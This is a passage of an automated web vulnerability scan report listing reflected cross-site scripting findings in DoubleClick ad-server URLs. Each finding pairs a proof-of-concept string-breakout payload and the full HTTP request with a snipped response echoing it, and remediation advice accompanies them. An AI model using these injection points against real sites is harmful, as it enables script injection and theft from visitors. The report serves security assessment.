The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc03"-alert(1)-"53df0e3547d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:16:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7943

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547dhttp://www.adobe.com/products/photoshop/photoshop/?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...

3.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b10"-alert(1)-"313bfda1deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/6c/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

3.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 588b5"-alert(1)-"bbb21bc460e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4924

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
.net/click%3Bh%3Dv8/3aae/7/69/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460ehttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

3.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c47f2"-alert(1)-"54049c07273 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7835
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 13:21:34 GMT
Expires: Mon, 14 Feb 2011 13:21:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
GFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273http://embassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml?WT.mc_id=z1ECNCAA2ES3D4H5MoreReason40543&cssiteid=1004575&csdartid=5784169940013199");
var fscUrl = url;
var fscUr
...[SNIP]...

3.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1417b"-alert(1)-"b9c926877f7 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4
...[SNIP]...

3.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 230d9"-alert(1)-"981c7121fd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7887

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csdartid%3D5784169940013170");
var
...[SNIP]...

3.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb08b"-alert(1)-"4523e8dc99a was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5More
...[SNIP]...

3.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 862c5"-alert(1)-"b9cec4b80de was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
